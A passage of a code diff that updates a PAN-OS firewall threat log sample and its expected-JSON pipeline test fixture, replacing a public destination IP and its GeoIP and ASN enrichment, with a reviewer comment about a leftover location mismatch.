16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28363,1,53100,443,12894,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7776,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28349,1,53101,443,62348,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7777,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28411,1,53104,443,6224,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7778,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:00,28397,1,53107,443,44120,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7779,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28347,1,53108,443,44228,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7780,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28443,1,53109,443,31322,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7781,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:14 PA-220 1,2018/11/30 16:45:13,012801096514,THREAT,url,2049,2018/11/30 16:45:13,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:13,28439,1,53118,443,1672,443,0x403000,tcp,block-url,"www.googleadservices.com/",(9999),business-and-economy,informational,client-to-server,7782,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 
PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,25958,1,53126,443,20801,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7783,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28429,1,53127,443,24533,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7784,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28465,1,53128,443,30150,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7785,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:15,28504,1,53129,443,36305,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7786,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28458,1,53130,443,42682,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7787,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28491,1,53131,443,22530,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7788,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28520,1,53132,443,43713,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7789,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 
16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28335,1,53133,443,60608,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7790,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28414,1,53134,443,9302,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7791,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:17 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28488,1,53135,443,11634,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7792,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:26,28469,1,53152,443,30818,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7793,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28556,1,53155,443,64260,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7794,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28558,1,53158,443,7071,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7795,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28531,1,53160,443,4512,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7796,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 
16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28580,1,53161,443,3422,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7797,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28477,1,53162,443,4651,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7798,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28484,1,53163,443,19068,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7799,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:27,28609,1,53164,443,5831,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7800,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28564,1,53165,443,7084,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7801,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28542,1,53166,443,18633,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7802,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28590,1,53167,443,25557,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7803,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:28 PA-220 1,2018/11/30 
16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28455,1,53150,443,20661,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7804,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28585,1,53185,443,65438,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7805,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28462,1,53187,443,53101,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7806,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:28,28839,1,53188,443,35463,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7807,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:30 PA-220 1,2018/11/30 16:45:29,012801096514,THREAT,url,2049,2018/11/30 16:45:29,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:29,28400,1,53178,443,45769,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7808,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json index 91d6ee4106b..a84a1cb8b94 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json 
@@ -7,26 +7,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -42,14 +44,14 @@ "port": 52984, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
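Review bot: The regenerated expectation at the top of this hunk asserts `"country_name": "China"` and `"region_name": "Jilin"` for 175.16.199.1 but keeps `"name": "United States"` inside the same `destination.geo` object, so the fixture now encodes two contradictory locations for one address. That `name` value appears to be taken from the destination-location column of the sample record itself (`...192.168.0.0-192.168.255.255,United States,...` in `event.original`), which the commit did not touch when it swapped the public IP. If the GeoIP answer for the supported test IP is the intended expectation, the matching column in the sample log should be updated as well (or the mismatch called out in the changelog entry), otherwise the test silently accepts an enrichment result that disagrees with the event's own data. The same pattern recurs in the hunks at `@@ -179,26 +181,28 @@` and `@@ -351,26 +355,28 @@`.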
@@ -64,7 +66,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:qjpdroY6VaRSEUbSXzSWtUX00kc=" + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" } }, "threat_category": "unknown", @@ -109,8 +111,8 @@ ], "network": { "community_id": [ - "1:mDxnuNGkonQEEYcMT0Dur/FCt/I=", - "1:qjpdroY6VaRSEUbSXzSWtUX00kc=" + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" ], "transport": "tcp", "application": "ssl", @@ -149,14 +151,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767671382Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691648800Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -179,26 +181,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -214,14 +218,14 @@ "port": 52983, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28219,1,52983,443,28249,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7727,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28219,1,52983,443,28249,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7727,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -236,7 +240,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:j6so5fl9DGKhDhaNmjI+6ipOFyc=" + "community_id": "1:k1x5UnaWY0lsTQok3Dy7GeOoceQ=" } }, "threat_category": "unknown", @@ -281,8 +285,8 @@ ], "network": { "community_id": [ - "1:svoGHRUXQeOT1QlGYhMbEalRiPU=", - "1:j6so5fl9DGKhDhaNmjI+6ipOFyc=" + "1:yRQhf+DxJ0lORwS6v0rca3ifDxU=", + "1:k1x5UnaWY0lsTQok3Dy7GeOoceQ=" ], "transport": "tcp", "application": "ssl", @@ -321,14 +325,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767684792Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 